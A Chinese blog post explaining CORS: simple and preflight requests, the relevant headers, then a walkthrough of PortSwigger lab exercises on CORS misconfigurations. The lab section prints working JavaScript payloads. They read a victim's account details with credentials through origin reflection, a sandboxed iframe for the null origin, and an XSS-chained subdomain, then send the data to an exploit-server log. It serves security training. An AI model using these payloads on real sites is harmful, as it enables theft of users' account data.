跨源资源共享（CORS）

战斗爽！战斗爽！战斗爽！战斗爽！战斗爽！

已于 2024-11-16 13:11:24 修改

阅读量1.4k

点赞数 13

分类专栏： HTTP安全文章标签： CORS 网络安全 web安全安全 HTTP PortSwigger 靶场 CORS 漏洞

于 2024-06-17 08:57:55 首次发布

本文链接：https://blog.csdn.net/weixin_42451330/article/details/139731363

版权

HTTP安全专栏收录该内容

3 篇文章

订阅专栏

一、跨源资源共享（CORS）介绍

跨源资源共享（Cross-Origin Resource Sharing，CORS）是一种web标准技术，它允许一个网站的服务器来响应其他网站的请求，从而打破了同源策略的限制。通过CORS，浏览器可以接收到服务器的响应，并查看该响应头部的"Access-Control-Allow-Origin"字段，如果该字段的值允许，或者是"*"（表示接受所有域），浏览器才会处理响应。通过CORS策略网站可以分享其资源，而不必担忧安全问题。

二、受到同源策略影响的一些操作

AJAX请求：同源策略会阻止使用XMLHttpRequest或Fetch API发起的跨域请求。

DOM访问：来自不同源的网站不能访问彼此的DOM。

Cookie，LocalStorage和IndexedDB：JavaScript不能读取到其他网站的数据。

但请注意，同源策略并非所有Web行为都有影响。例如，<img>元素、<script>元素和<link>元素等可以加载任何网站的资源，这是因为这些操作并不会访问到其他源的文档或脚本。

三、简单请求示例

某些请求不会触发 CORS 预检请求。如：

1、GET、HEAD、POST方法

2、除了被用户代理自动设置的标头字段

3、Content-Type 标头所指定的媒体类型的值仅限于下列三者之一：（text/plain、multipart/form-data、application/x-www-form-urlencoded）

4、请求中没有使用 ReadableStream 对象

假如站点 https://foo.example 的网页应用想要访问 https://bar.other 的资源。foo.example 的网页中可能包含类似于下面的 JavaScript 代码：

const xhr = new XMLHttpRequest();
const url = "https://bar.other/resources/public-data/";
xhr.open("GET", url);
xhr.onreadystatechange = someHandler;
xhr.send();

浏览器发送给服务器的请求报文：

Copy to Clipboard
GET /resources/public-data/ HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
Origin: https://foo.example

服务器响应:

HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 00:23:53 GMT
Server: Apache/2
Access-Control-Allow-Origin: *
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/xml

[…XML Data…]

四、预检请求示例

1、执行预检请求的 HTTP 请求：

const xhr = new XMLHttpRequest();
xhr.open("POST", "https://bar.other/resources/post-here/");
xhr.setRequestHeader("X-PINGOTHER", "pingpong");
xhr.setRequestHeader("Content-Type", "application/xml");
xhr.onreadystatechange = handler;
xhr.send("<person><name>Arun</name></person>");

2、首次交互是预检请求/响应：

OPTIONS /doc HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
Origin: https://foo.example
Access-Control-Request-Method: POST
Access-Control-Request-Headers: X-PINGOTHER, Content-Type

HTTP/1.1 204 No Content
Date: Mon, 01 Dec 2008 01:15:39 GMT
Server: Apache/2
Access-Control-Allow-Origin: https://foo.example
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Headers: X-PINGOTHER, Content-Type
Access-Control-Max-Age: 86400  //24 小时
Vary: Accept-Encoding, Origin
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive

3、预检请求完成之后，发送实际请求/响应：

POST /doc HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
X-PINGOTHER: pingpong
Content-Type: text/xml; charset=UTF-8
Referer: https://foo.example/examples/preflightInvocation.html
Content-Length: 55
Origin: https://foo.example
Pragma: no-cache
Cache-Control: no-cache

<person><name>Arun</name></person>

HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 01:15:40 GMT
Server: Apache/2
Access-Control-Allow-Origin: https://foo.example
Vary: Accept-Encoding, Origin
Content-Encoding: gzip
Content-Length: 235
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: text/plain

[Some XML payload]

五、涉及的HTTP 响应标头字段

1、允许浏览器访问的资源

Access-Control-Allow-Origin: https://mozilla.org

2、getResponseHeader() 方法只能拿到一些最基本的响应头，使用下面的相应标头可以使浏览器获取其他响应头。

Access-Control-Expose-Headers: X-My-Custom-Header, X-Another-Custom-Header

3、指定了 preflight 请求的结果能够被缓存多久

Access-Control-Max-Age: <delta-seconds>

4、当浏览器的 credentials 设置为 true 时是否允许浏览器读取 response 的内容

Access-Control-Allow-Credentials: true

5、指定访问资源时允许的请求方法

Access-Control-Allow-Methods: <method>

6、指用于预检请求的响应。其指明了实际请求中允许携带的标头字段。

Access-Control-Allow-Headers: <header-name>

六、涉及的HTTP 请求标头字段

1、表明预检请求或实际跨源请求的源站。

Origin: <origin>

2、标头字段用于预检请求。将实际请求所使用的 HTTP 方法告诉服务器。

Access-Control-Request-Method: <method>

3、标头字段用于预检请求。将实际请求所携带的标头字段（通过 setRequestHeader() 等设置的）告诉服务器.

Access-Control-Request-Headers: <field-name>

七、简单跨站脚本攻击示例

1、假定存在一个网站 https://vulnerable-website.com，它允许来自任何源的 CORS 请求，也就是说它的服务器对任何请求都返回Access-Control-Allow-Origin: *响应头。

2、攻击者创建了一个恶意网站 https://evil.com，这个网站上有一段 JavaScript 代码，当受害者访问时，该代码会发送一个AJAX请求到 https://vulnerable-website.com。

3、如果受害者在访问恶意网站的同时，还保持着对https://vulnerable-website.com的登录状态，那么这个 AJAX 请求就会带上受害者对https://vulnerable-website.com的 cookies。

4、由于 https://vulnerable-website.com 允许来自任何源的请求，服务器就会处理这个带有受害者 cookies 的请求，并返回相应的数据。

5、恶意网站 https://evil.com 收到了这个响应，并可以通过 JavaScript 代码来读取响应数据，从而获取了受害者在 https://vulnerable-website.com 上的敏感数据。

八、PortSwigger 靶场实战

1、基本源反射的 CORS 漏洞（利用服务端不安全配置）

某些应用程序需要提供对许多其他域的访问权限。维护允许的域列表需要持续的努力，任何错误都有可能破坏功能。因此，某些应用程序采取了简单的方法，即有效地允许从任何其他域进行访问。

（1）观察数据包，发现用户获取敏感信息的时候服务器使用了不安全的CORS配置。

Access-Control-Allow-Credentials: true

当浏览器的 credentials 设置为 true 时是否允许浏览器读取 response 的内容。

测试是否能反射传入的origin源，通过测试可以正常返回传入的源，接下直接利用

（2）构造攻击网站负载页面，内容为通过构造的前端页面自动访问目标页面获取受害者敏感信息。

url

https://exploit-0af0000e035f14a183b5ea0d01dd00e6.exploit-server.net/exploit

Head：

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8

Body:

hello word
<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://0ac5007403d0147b8327eb0000b200ba.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>

（3）诱导攻击者访问构造的攻击网站

https://exploit-0af0000e035f14a183b5ea0d01dd00e6.exploit-server.net/exploit

（4）从日志获取敏感信息

2、Origin 标头白名单绕过（利用白名单匹配规则）

实施 CORS 源站白名单时，经常会出现错误。一些组织决定允许来自其所有子域（包括尚不存在的未来子域）的访问。一些应用程序允许从其他各种组织的域（包括其子域）进行访问。这些规则通常是通过匹配 URL 前缀或后缀或使用正则表达式来实现的。实施中的任何错误都可能导致向意外的外部域授予访问权限。

（1）url后缀正则表达式绕错：例如

normal-website.com

攻击者可能能够通过注册域来获得访问权限：

hackersnormal-website.com

（2）url前缀正则表达式绕错：例如

normal-website.com

攻击者或许能够使用以下域获得访问权限：

normal-website.com.evil-user.net

3、具有可信 null 源的 CORS 漏洞（利用origin为null）

当网站配置了不安全的 CORS 配置时，如：信任“null”源，存在CORS漏洞

（1）通过将Origin改为null进行测试，Access-Control-Allow-Origin返回null表示存在该漏洞。

（2）构造漏洞利用服务器 HTML（注意使用 iframe 沙盒，因为这会生成 null 源请求）

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>

（3）诱导攻击者访问构造的攻击网站

4、受信任的不安全协议的 CORS 漏洞（利用受信任网站XSS绕过）

即使 “正确” 配置了 CORS，也可以在两个源之间建立信任关系。如果网站信任易受跨站点脚本（XSS）攻击的源，则攻击者可以利用 XSS 注入一些 JavaScript，这些 JavaScript 使用 CORS 从信任易受攻击的应用程序的站点检索敏感信息。

1、通过检查源代码发现，当检查库存的时候会调用子域名的接口

2、访问给接口并尝试修改参数，发现修改参数后会报错并将错误直接展示在浏览器，如图：

3、尝试xss漏洞，发现能成功利用，如图:

4、开始构造攻击路径，首先构造攻击页面，诱导受害者访问攻击页面，进而加载带有xss漏洞的目标子网站，子网站将执行恶意xss代码，请求主域名的敏感数据，由于主网站cors配置了允许子域名，子域名网页将会正常接收并处理敏感数据，最终通过子域名执行script代码将敏感数据传回攻击机

攻击界面如下：

hello
<script>
    document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

受害者访问攻击页面：